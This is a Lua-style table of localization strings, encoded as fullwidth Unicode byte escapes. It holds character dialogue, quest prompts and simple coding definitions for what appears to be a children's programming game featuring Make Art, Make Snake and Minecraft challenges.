["chiefPixelHackerQuest7"] = "\239\188\183\239\189\133\239\189\140\239\189\140 \239\189\132\239\189\143\239\189\142\239\189\133 \239\189\153\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\151\239\189\133\239\189\140\239\189\140 \239\189\143\239\189\142 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\151\239\189\129\239\189\153 \239\189\148\239\189\143 \239\189\130\239\189\133\239\189\131\239\189\143\239\189\141\239\189\137\239\189\142\239\189\135 \239\189\129\239\189\142 \239\189\133\239\189\152\239\189\144\239\189\133\239\189\146\239\189\148 \239\188\176\239\189\137\239\189\152\239\189\133\239\189\140 \239\188\168\239\189\129\239\189\131\239\189\139\239\189\133\239\189\146. \239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\135\239\189\133\239\189\148 \239\189\147\239\189\143\239\189\141\239\189\133 \239\189\147\239\189\151\239\189\133\239\189\133\239\189\148 \239\189\146\239\189\133\239\189\151\239\189\129\239\189\146\239\189\132\239\189\147 \239\189\137\239\189\134 \239\189\153\239\189\143\239\189\149 \239\189\141\239\189\129\239\189\139\239\189\133 \239\189\137\239\189\148 \239\189\129\239\189\140\239\189\140 \239\189\148\239\189\136\239\189\133 \239\189\151\239\189\129\239\189\153 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\133\239\189\142\239\189\132 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\137\239\189\152\239\189\133\239\189\140 \239\188\168\239\189\129\239\189\131\239\189\139 \239\189\143\239\189\146 \239\188\179\239\189\149\239\189\141\239\189\141\239\189\133\239\189\146 \239\188\163\239\189\129\239\189\141\239\189\144 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147.",
["chiefPixelHackerQuest6"] = "\239\188\168\239\189\143\239\189\151 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\153\239\189\143\239\189\149 \239\189\148\239\189\146\239\189\153 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\133\239\189\132\239\189\137\239\189\149\239\189\141 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148?",
["chiefPixelHackerQuest5"] = "\239\188\185\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\135\239\189\133\239\189\148\239\189\148\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\136\239\189\133 \239\189\136\239\189\129\239\189\142\239\189\135 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\137\239\189\147, \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\133\239\189\129\239\189\140 \239\189\134\239\189\149\239\189\142 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\149\239\189\147\239\189\137\239\189\142\239\189\135 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\148\239\189\143 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\137\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\153\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\133 \239\189\129\239\189\146\239\189\148\239\189\151\239\189\143\239\189\146\239\189\139\239\189\147 \239\189\137\239\189\142 \239\189\141\239\189\137\239\189\142\239\189\149\239\189\148\239\189\133\239\189\147 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\151\239\189\143\239\189\149\239\189\140\239\189\132 \239\189\148\239\189\129\239\189\139\239\189\133 \239\189\136\239\189\143\239\189\149\239\189\146\239\189\147 \239\189\148\239\189\143 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\133 \239\189\130\239\189\153 \239\189\136\239\189\129\239\189\142\239\189\132 \239\189\129\239\189\147 \239\189\140\239\189\143\239\189\142\239\189\135 \239\189\129\239\189\147 \239\189\153\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\133 \239\189\146\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\134\239\189\149\239\189\142\239\189\131\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\148\239\189\143 \239\189\149\239\189\147\239\189\133. \239\188\183\239\189\136\239\189\153 \239\189\132\239\189\143\239\189\142'\239\189\148 \239\189\153\239\189\143\239\189\149 \239\189\148\239\189\146\239\189\153 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\136\239\189\129\239\189\142\239\189\132 \239\189\129\239\189\148 \239\189\148\239\189\136\239\189\133 \239\188\173\239\189\133\239\189\132\239\189\137\239\189\149\239\189\141 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147? \239\188\185\239\189\143\239\189\149'\239\189\140\239\189\140 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142 \239\189\136\239\189\143\239\189\151 \239\189\148\239\189\143 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\133 \239\189\147\239\189\148\239\189\129\239\189\146\239\189\146\239\189\153 \239\189\142\239\189\137\239\189\135\239\189\136\239\189\148\239\189\147 \239\189\129\239\189\142\239\189\132 \239\189\146\239\189\129\239\189\137\239\189\142\239\189\130\239\189\143\239\189\151\239\189\147 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\138\239\189\149\239\189\147\239\189\148 \239\189\129 \239\189\134\239\189\133\239\189\151 \239\189\140\239\189\137\239\189\142\239\189\133\239\189\147 \239\189\143\239\189\134 \239\189\131\239\189\143\239\189\132\239\189\133.",
["chiefPixelHackerQuest4"] = "\239\188\161\239\189\146\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\135\239\189\143\239\189\137\239\189\142\239\189\135 \239\189\148\239\189\143 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133 \239\189\148\239\189\136\239\189\133 \239\189\130\239\189\129\239\189\147\239\189\137\239\189\131 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147? \239\188\185\239\189\143\239\189\149 \239\189\131\239\189\129\239\189\142 \239\189\132\239\189\143 \239\189\137\239\189\148 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\146\239\189\142\239\189\133\239\189\146.",
["makeMinecraft"] = "\239\188\178\239\189\133\239\189\129\239\189\132\239\189\153 \239\189\148\239\189\143 \239\188\168\239\189\129\239\189\131\239\189\139 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\131\239\189\146\239\189\129\239\189\134\239\189\148?",
["llCheerfulGirl"] = "\239\188\180\239\189\136\239\189\133\239\189\147\239\189\133 \239\188\168\239\188\164\239\188\173\239\188\169 \239\189\131\239\189\129\239\189\130\239\189\140\239\189\133\239\189\147 \239\189\147\239\189\133\239\189\142\239\189\132 \239\189\141\239\189\137\239\189\140\239\189\140\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\143\239\189\134 \239\189\148\239\189\137\239\189\142\239\189\153 \239\189\130\239\189\140\239\189\143\239\189\131\239\189\139\239\189\147 \239\189\143\239\189\134 \239\189\131\239\189\143\239\189\140\239\189\143\239\189\146 \239\189\131\239\189\129\239\189\140\239\189\140\239\189\133\239\189\132 \239\189\144\239\189\137\239\189\152\239\189\133\239\189\140\239\189\147 \239\189\148\239\189\143 \239\189\129 \239\189\147\239\189\131\239\189\146\239\189\133\239\189\133\239\189\142. \239\188\168\239\189\129\239\189\150\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\133\239\189\150\239\189\133\239\189\146 \239\189\148\239\189\146\239\189\137\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\144\239\189\140\239\189\149\239\189\135 \239\189\143\239\189\142\239\189\133 \239\189\137\239\189\142?",
["how"] = "\239\188\168\239\189\143\239\189\151 \239\189\132\239\189\143\239\189\133\239\189\147 \239\189\137\239\189\148 \239\189\151\239\189\143\239\189\146\239\189\139?",
["devJames"] = "\239\188\179\239\189\143 \239\189\141\239\189\129\239\189\142\239\189\153 \239\189\144\239\189\137\239\189\152\239\189\133\239\189\140\239\189\147... \239\189\147\239\189\143 \239\189\147\239\189\140\239\189\133\239\189\133\239\189\144\239\189\153...",
["Jack"] = "\239\188\170\239\189\129\239\189\131\239\189\139",
["map"] = "\239\188\173\239\189\129\239\189\144",
["jungleAsterix2"] = "\239\188\161\239\189\146\239\189\133 \239\189\153\239\189\143\239\189\149 \239\189\130\239\189\146\239\189\129\239\189\150\239\189\133 \239\189\133\239\189\142\239\189\143\239\189\149\239\189\135\239\189\136 \239\189\148\239\189\143 \239\189\135\239\189\133\239\189\148 \239\189\144\239\189\129\239\189\147\239\189\148 \239\189\140\239\189\133\239\189\150\239\189\133\239\189\140 2 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\179\239\189\142\239\189\129\239\189\139\239\189\133?",
["flappyJudoka"] = "\239\188\176\239\189\140\239\189\129\239\189\153 \239\188\166\239\189\140\239\189\129\239\189\144\239\189\144\239\189\153 \239\188\170\239\189\149\239\189\132\239\189\143\239\189\139\239\189\129",
["chiefPixelHackerQuest1"] = "\239\188\168\239\189\133\239\189\140\239\189\140\239\189\143 \239\189\151\239\189\133\239\189\140\239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\188\173\239\189\143\239\188\173\239\188\161. \239\188\169 \239\189\129\239\189\141 \239\189\148\239\189\136\239\189\133 \239\188\163\239\189\149\239\189\146\239\189\129\239\189\148\239\189\143\239\189\146. \239\188\169 \239\189\135\239\189\149\239\189\133\239\189\147\239\189\147 \239\189\153\239\189\143\239\189\149 \239\189\136\239\189\129\239\189\150\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\133 \239\189\148\239\189\143 \239\189\140\239\189\133\239\189\129\239\189\146\239\189\142 \239\189\147\239\189\143\239\189\141\239\189\133 \239\189\141\239\189\143\239\189\146\239\189\133 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148? \239\188\180\239\189\146\239\189\153 \239\189\143\239\189\149\239\189\148 \239\189\143\239\189\149\239\189\146 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148 \239\188\177\239\189\149\239\189\137\239\189\154!",
["jungleWildAntlerBoy3"] = "\239\188\174\239\189\137\239\189\131\239\189\133 \239\189\143\239\189\142\239\189\133! \239\188\183\239\189\136\239\189\129\239\189\148 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\133 '\239\188\163\239\188\164' \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132?",
["jungleWildAntlerBoy2"] = "\239\188\168\239\189\141\239\189\141... \239\189\129 \239\189\134\239\189\129\239\189\142\239\189\131\239\189\153 \239\189\129\239\189\142\239\189\147\239\189\151\239\189\133\239\189\146 \239\189\130\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\129\239\189\137\239\189\142'\239\189\148 \239\189\146\239\189\137\239\189\135\239\189\136\239\189\148 \239\189\134\239\189\143\239\189\146 \239\189\148\239\189\136\239\189\133 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140.",
["jungleWildAntlerBoy5"] = "\239\188\168\239\189\129\239\189\136\239\189\129 \239\189\153\239\189\143\239\189\149'\239\189\146\239\189\133 \239\189\146\239\189\137\239\189\135\239\189\136\239\189\148! \239\188\166\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\145\239\189\149\239\189\133\239\189\147\239\189\148\239\189\137\239\189\143\239\189\142: \239\188\183\239\189\136\239\189\129\239\189\148 \239\189\132\239\189\143\239\189\133\239\189\147 '\239\188\178\239\188\173' \239\189\141\239\189\133\239\189\129\239\189\142?",
["jungleWildAntlerBoy4"] = "\239\188\167\239\189\143\239\189\143\239\189\132 \239\189\135\239\189\143\239\189\137\239\189\142\239\189\135. \239\188\161\239\189\142\239\189\132 \239\189\151\239\189\136\239\189\129\239\189\148 \239\189\132\239\189\143\239\189\133\239\189\147 '\239\188\173\239\188\182' \239\189\141\239\189\133\239\189\129\239\189\142?",
["jungleWildAntlerBoy6"] = "\239\188\175\239\189\143\239\189\143\239\189\143\239\189\136 \239\189\131\239\189\143\239\189\142\239\189\135\239\189\146\239\189\129\239\189\148\239\189\149\239\189\140\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147, \239\189\153\239\189\143\239\189\149 \239\189\146\239\189\133\239\189\129\239\189\140\239\189\140\239\189\153 \239\189\132\239\189\143 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\153\239\189\143\239\189\149\239\189\146 \239\189\148\239\189\133\239\189\146\239\189\141\239\189\137\239\189\142\239\189\129\239\189\140 \239\189\131\239\189\143\239\189\141\239\189\141\239\189\129\239\189\142\239\189\132\239\189\147. \239\188\183\239\189\133\239\189\140\239\189\140 \239\189\132\239\189\143\239\189\142\239\189\133.",
["cCurrent"] = "\239\188\161\239\189\142 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\137\239\189\131 \239\189\131\239\189\149\239\189\146\239\189\146\239\189\133\239\189\142\239\189\148 \239\189\137\239\189\147 \239\189\129 \239\189\134\239\189\140\239\189\143\239\189\151 \239\189\143\239\189\134 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\137\239\189\131 \239\189\131\239\189\136\239\189\129\239\189\146\239\189\135\239\189\133. \239\188\169\239\189\142 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\137\239\189\131 \239\189\131\239\189\137\239\189\146\239\189\131\239\189\149\239\189\137\239\189\148\239\189\147 \239\189\148\239\189\136\239\189\137\239\189\147 \239\189\131\239\189\136\239\189\129\239\189\146\239\189\135\239\189\133 \239\189\137\239\189\147 \239\189\143\239\189\134\239\189\148\239\189\133\239\189\142 \239\189\131\239\189\129\239\189\146\239\189\146\239\189\137\239\189\133\239\189\132 \239\189\130\239\189\153 \239\189\141\239\189\143\239\189\150\239\189\137\239\189\142\239\189\135 \239\189\133\239\189\140\239\189\133\239\189\131\239\189\148\239\189\146\239\189\143\239\189\142\239\189\147 \239\189\137\239\189\142 \239\189\129 \239\189\151\239\189\137\239\189\146\239\189\133.",
["devAlbert"] = "\239\188\168\239\189\143\239\189\140\239\189\129! \239\188\169'\239\189\141 \239\189\129 \239\189\130\239\189\137\239\189\135 \239\189\134\239\189\129\239\189\142 \239\189\143\239\189\134 \239\188\172\239\189\137\239\189\142\239\189\149\239\189\152, \239\189\133\239\189\141\239\189\130\239\189\133\239\189\132\239\189\132\239\189\133\239\189\132 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\137\239\189\142\239\189\135, \239\189\129\239\189\142\239\189\132 \239\189\129\239\189\146\239\189\146\239\189\129\239\189\142\239\189\135\239\189\137\239\189\142\239\189\135 \239\189\130\239\189\137\239\189\148\239\189\147 \239\189\137\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\146\239\189\146\239\189\133\239\189\131\239\189\148 \239\189\143\239\189\146\239\189\132\239\189\133\239\189\146.",
["cIfStatement"] = "\239\188\180\239\189\133\239\189\140\239\189\140\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\143 \239\189\146\239\189\149\239\189\142 \239\189\129 \239\189\130\239\189\140\239\189\143\239\189\131\239\189\139 \239\189\143\239\189\134 \239\189\131\239\189\143\239\189\132\239\189\133 \239\189\137\239\189\134 \239\189\129 \239\189\131\239\189\133\239\189\146\239\189\148\239\189\129\239\189\137\239\189\142 \239\189\131\239\189\143\239\189\142\239\189\132\239\189\137\239\189\148\239\189\137\239\189\143\239\189\142 \239\189\137\239\189\147 \239\189\141\239\189\133\239\189\148.",
["hdmiQuest2"] = "\239\188\163\239\189\129\239\189\142 \239\189\153\239\189\143\239\189\149 \239\189\132\239\189\143 \239\189\129\239\189\142 \239\189\137\239\189\142\239\189\148\239\189\133\239\189\146\239\189\150\239\189\137\239\189\133\239\189\151 \239\189\151\239\189\137\239\189\148\239\189\136 \239\189\143\239\189\149\239\189\146 \239\189\146\239\189\133\239\189\144\239\189\143\239\189\146\239\189\148\239\189\133\239\189\146?",
["hdmiQuest3"] = "\239\188\174\239\189\137\239\189\131\239\189\133 \239\189\143\239\189\142\239\189\133. \239\188\180\239\189\136\239\189\137\239\189\147 \239\189\146\239\189\133\239\189\144\239\189\143\239\189\146\239\189\148 \239\189\151\239\189\137\239\189\140\239\189\140 \239\189\130\239\189\140\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\133 \239\188\183\239\189\136\239\189\137\239\189\148\239\189\133 \239\188\178\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\147\239\189\148\239\189\143\239\189\146\239\189\153 \239\189\151\239\189\137\239\189\132\239\189\133 \239\189\143\239\189\144\239\189\133\239\189\142!\010\239\188\174\239\189\143\239\189\151 \239\189\151\239\189\133 \239\189\138\239\189\149\239\189\147\239\189\148 \239\189\142\239\189\133\239\189\133\239\189\132 \239\189\148\239\189\143 \239\189\134\239\189\143\239\189\140\239\189\140\239\189\143\239\189\151 \239\189\149\239\189\144 \239\189\143\239\189\142 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\137\239\189\135\239\189\136\239\189\148\239\189\137\239\189\142\239\189\135\239\189\147 \239\189\129\239\189\148 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\143\239\189\146\239\189\148 \239\189\143\239\189\134 \239\188\179\239\189\143\239\189\149\239\189\142\239\189\132.",
["momaProgrammer"] = "\239\188\164\239\189\137\239\189\132 \239\189\153\239\189\143\239\189\149 \239\189\139\239\189\142\239\189\143\239\189\151 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\141\239\189\129\239\189\139\239\189\133 \239\189\129\239\189\146\239\189\148 \239\189\149\239\189\147\239\189\133\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\144\239\189\146\239\189\143\239\189\135\239\189\146\239\189\129\239\189\141\239\189\141\239\189\137\239\189\142\239\189\135 \239\189\140\239\189\129\239\189\142\239\189\135\239\189\149\239\189\129\239\189\135\239\189\133 \239\188\163\239\189\143\239\189\134\239\189\134\239\189\133\239\189\133\239\188\179\239\189\131\239\189\146\239\189\137\239\189\144\239\189\148? \239\188\169\239\189\148'\239\189\147 \239\189\146\239\189\133\239\189\129\239\189\140\239\189\140\239\189\153 \239\189\129\239\189\141\239\189\129\239\189\154\239\189\137\239\189\142\239\189\135.",
["cCodeTitle"] = "\239\188\163\239\189\143\239\189\132\239\189\133",
["checkMap"] = "\239\188\163\239\189\136\239\189\133\239\189\131\239\189\139 \239\188\173\239\189\129\239\189\144",
["cBinaryTitle"] = "\239\188\162\239\189\137\239\189\142\239\189\129\239\189\146\239\189\153",
["enter"] = "\239\188\176\239\189\146\239\189\133\239\189\147\239\189\147 \239\188\165\239\189\142\239\189\148\239\189\133\239\189\146",
["newsWatcher"] = "\239\188\179\239\189\136\239\189\136\239\189\136, \239\188\169'\239\189\141 \239\189\147\239\189\149\239\189\131\239\189\136 \239\189\129 \239\189\134\239\189\129\239\189\142 \239\189\143\239\189\134 \239\189\148\239\189\136\239\189\133 \239\188\168\239\188\164 \239\188\174\239\189\133\239\189\151\239\189\147 \239\188\163\239\189\146\239\189\133\239\189\151.",
["hdmiQuest"] = "\239\188\168\239\189\133\239\189\153\239\189\129. \239\188\183\239\189\133 \239\189\151\239\189\133\239\189\146\239\189\133 \239\189\141\239\189\129\239\189\139\239\189\137\239\189\142\239\189\135 \239\189\129 \239\189\134\239\189\137\239\189\140\239\189\141 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\133 \239\189\153\239\189\133\239\189\140\239\189\140\239\189\143\239\189\151 \239\189\131\239\189\129\239\189\130\239\189\140\239\189\133 \239\189\148\239\189\146\239\189\129\239\189\142\239\189\147\239\189\134\239\189\133\239\189\146\239\189\146\239\189\137\239\189\142\239\189\135 \239\189\144\239\189\137\239\189\131\239\189\148\239\189\149\239\189\146\239\189\133\239\189\147, \239\189\150\239\189\137\239\189\132\239\189\133\239\189\143 \239\189\129\239\189\142\239\189\132 \239\189\147\239\189\143\239\189\149\239\189\142\239\189\132 \239\189\134\239\189\146\239\189\143\239\189\141 \239\189\148\239\189\136\239\189\133 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\147\239\189\131\239\189\146\239\189\133\239\189\133\239\189\142, \239\189\151\239\189\136\239\189\133\239\189\142 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\147\239\189\148\239\189\146\239\189\129\239\189\142\239\189\135\239\189\133 \239\188\183\239\189\136\239\189\137\239\189\148\239\189\133 \239\188\178\239\189\129\239\189\130\239\189\130\239\189\137\239\189\148 \239\189\146\239\189\129\239\189\142 \239\189\144\239\189\129\239\189\147\239\189\148.",
["audioQuestHelp2"] = "\239\188\179\239\189\144\239\189\133\239\189\129\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\189\132\239\189\137\239\189\147\239\189\131\239\189\143 \239\189\132\239\189\129\239\189\142\239\189\131\239\189\133\239\189\146\239\189\147.",
["audioQuestHelp3"] = "\239\188\172\239\189\129\239\189\149\239\189\142\239\189\131\239\189\136 \239\188\179\239\189\143\239\189\142\239\189\137\239\189\131 \239\188\176\239\189\137 \239\189\129\239\189\142\239\189\132 \239\189\151\239\189\146\239\189\137\239\189\148\239\189\133 \239\189\129 \239\189\147\239\189\143\239\189\142\239\189\135.",
["audioQuestHelp4"] = "\239\188\168\239\189\133\239\189\129\239\189\146 \239\189\151\239\189\136\239\189\129\239\189\148 \239\188\170\239\189\129\239\189\131\239\189\139 \239\189\136\239\189\129\239\189\147 \239\189\148\239\189\143 \239\189\147\239\189\129\239\189\153.",
["launchShareTemp"] = "\239\188\172\239\189\129\239\189\149\239\189\142\239\189\131\239\189\136",
["momaArtAdmirer2"] = "\239\188\183\239\189\143\239\189\151 \239\189\131\239\189\136\239\189\133\239\189\131\239\189\139 \239\189\143\239\189\149\239\189\148 \239\189\148\239\189\136\239\189\143\239\189\147\239\189\133 \239\189\144\239\189\137\239\189\152\239\189\133\239\189\140\239\189\147!",
["momaArtAdmirer1"] = "\239\188\169 \239\189\140\239\189\143\239\189\150\239\189\133 \239\189\148\239\189\136\239\189\133\239\189\147\239\189\133 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\137\239\189\143\239\189\142\239\189\147 \239\189\147\239\189\143 \239\189\141\239\189\149\239\189\131\239\189\136! \239\188\169 \239\189\136\239\189\143\239\189\144\239\189\133 \239\189\148\239\189\136\239\189\129\239\189\148 \239\189\143\239\189\142\239\189\133 \239\189\143\239\189\134 \239\189\141\239\189\153 \239\188\179\239\189\148\239\189\129\239\189\134\239\189\134 \239\188\176\239\189\137\239\189\131\239\189\139\239\189\147 \239\189\132\239\189\137\239\189\147\239\189\144\239\189\140\239\189\129\239\189\153\239\189\147 \239\189\136\239\189\133\239\189\146\239\189\133 \239\189\147\239\189\143\239\189\141\239\189\133 \239\189\132\239\189\129\239\189\153.",
["makeArtQuestHelp1"] = "\239\188\167\239\189\143 \239\189\148\239\189\143 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133 \239\189\129\239\189\142\239\189\132 \239\189\148\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\137\239\189\152\239\189\133\239\189\140 \239\188\168\239\189\129\239\189\131\239\189\139\239\189\133\239\189\146.",
["makeArtQuestHelp3"] = "\239\188\180\239\189\129\239\189\140\239\189\139 \239\189\148\239\189\143 \239\189\148\239\189\136\239\189\133 \239\188\176\239\189\137\239\189\152\239\189\133\239\189\140 \239\188\168\239\189\129\239\189\131\239\189\139\239\189\133\239\189\146 \239\189\137\239\189\142 \239\188\182\239\189\133\239\189\131\239\189\148\239\189\143\239\189\146 \239\188\182\239\189\137\239\189\140\239\189\140\239\189\129\239\189\135\239\189\133.",
["makeArtQuestHelp2"] = "\239\188\163\239\189\143\239\189\141\239\189\144\239\189\140\239\189\133\239\189\148\239\189\133 \239\189\134\239\189\137\239\189\146\239\189\147\239\189\148 3 \239\189\130\239\189\129\239\189\147\239\189\137\239\189\131 \239\189\131\239\189\136\239\189\129\239\189\140\239\189\140\239\189\133\239\189\142\239\189\135\239\189\133\239\189\147 \239\189\137\239\189\142 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148.",
["cBit"] = "\239\188\180\239\189\136\239\189\133 \239\189\147\239\189\141\239\189\129\239\189\140\239\189\140\239\189\133\239\189\147\239\189\148 \239\189\149\239\189\142\239\189\137\239\189\148 \239\189\143\239\189\134 \239\189\132\239\189\129\239\189\148\239\189\129 \239\189\137\239\189\142 \239\189\129 \239\189\131\239\189\143\239\189\141\239\189\144\239\189\149\239\189\148\239\189\133\239\189\146. \239\188\169\239\189\148 \239\189\136\239\189\129\239\189\147 \239\189\129 \239\189\147\239\189\137\239\189\142\239\189\135\239\189\140\239\189\133 \239\189\130\239\189\137\239\189\142\239\189\129\239\189\146\239\189\153 \239\189\150\239\189\129\239\189\140\239\189\149\239\189\133, \239\189\129 0 \239\189\143\239\189\146 1.",
["portetherCafeGirl"] = "\239\188\169 \239\189\148\239\189\136\239\189\137\239\189\142\239\189\139 \239\189\148\239\189\136\239\189\129\239\189\148 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142 \239\189\137\239\189\147 \239\189\148\239\189\136\239\189\133 \239\189\130\239\189\133\239\189\147\239\189\148 \239\189\144\239\189\146\239\189\143\239\189\135\239\189\146\239\189\129\239\189\141\239\189\141\239\189\137\239\189\142\239\189\135 \239\189\140\239\189\129\239\189\142\239\189\135\239\189\149\239\189\129\239\189\135\239\189\133. \239\188\183\239\189\129\239\189\142\239\189\142\239\189\129 \239\189\136\239\189\133\239\189\129\239\189\146 \239\189\141\239\189\143\239\189\146\239\189\133 \239\189\129\239\189\130\239\189\143\239\189\149\239\189\148 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142?",
["jungleDaringBoy"] = "\239\188\169 \239\189\147\239\189\144\239\189\133\239\189\129\239\189\139 \239\189\132\239\189\143\239\189\154\239\189\133\239\189\142\239\189\147 \239\189\143\239\189\134 \239\189\140\239\189\129\239\189\142\239\189\135\239\189\149\239\189\129\239\189\135\239\189\133\239\189\147. \239\188\169 \239\189\131\239\189\143\239\189\142\239\189\148\239\189\146\239\189\143\239\189\140 \239\188\173\239\189\137\239\189\142\239\189\133\239\189\131\239\189\146\239\189\129\239\189\134\239\189\148 \239\189\151\239\189\137\239\189\148\239\189\136 \239\188\176\239\189\153\239\189\148\239\189\136\239\189\143\239\189\142. \239\188\161\239\189\142\239\189\132 \239\189\131\239\189\146\239\189\133\239\189\129\239\189\148\239\189\133 \239\189\151\239\189\133\239\189\130\239\189\147\239\189\137\239\189\148\239\189\133\239\189\147 \239\189\151\239\189\137\239\189\148\239\189\136 \239\188\170\239\189\129\239\189\150\239\189\129\239\189\147\239\189\131\239\189\146\239\189\137\239\189\144\239\189\148.",
["makeArtTerminal2"] = "\239\188\163\239\189\143\239\189\141\239\189\133 \239\189\130\239\189\129\239\189\131\239\189\139 \239\189\147\239\189\143\239\189\143\239\189\142...",
["makeArtTerminal1"] = "\239\188\163\239\189\146\239\189\133\239\189\129\239\189\148\239\189\133 \239\189\129 \239\189\141\239\189\129\239\189\147\239\189\148\239\189\133\239\189\146\239\189\144\239\189\137\239\189\133\239\189\131\239\189\133 \239\189\151\239\189\137\239\189\148\239\189\136 \239\188\173\239\189\129\239\189\139\239\189\133 \239\188\161\239\189\146\239\189\148?",
["maps"] = "\239\188\183\239\189\136\239\189\133\239\189\146\239\189\133 \239\189\129\239\189\141 \239\188\169?",
["tempUpdatesAvailableCopy"] = "\239\188\181\239\189\144\239\189\132\239\189\129\239\189\148\239\189\133\239\189\147 \239\189\134\239\189\143\239\189\149\239\189\142\239\189\132! \239\188\169\239\189\142\239\189\147\239\189\148\239\189\129\239\189\140\239\189\140 \239\189\148\239\189\136\239\189\133\239\189\141 \239\189\142\239\189\143\239\189\151?",
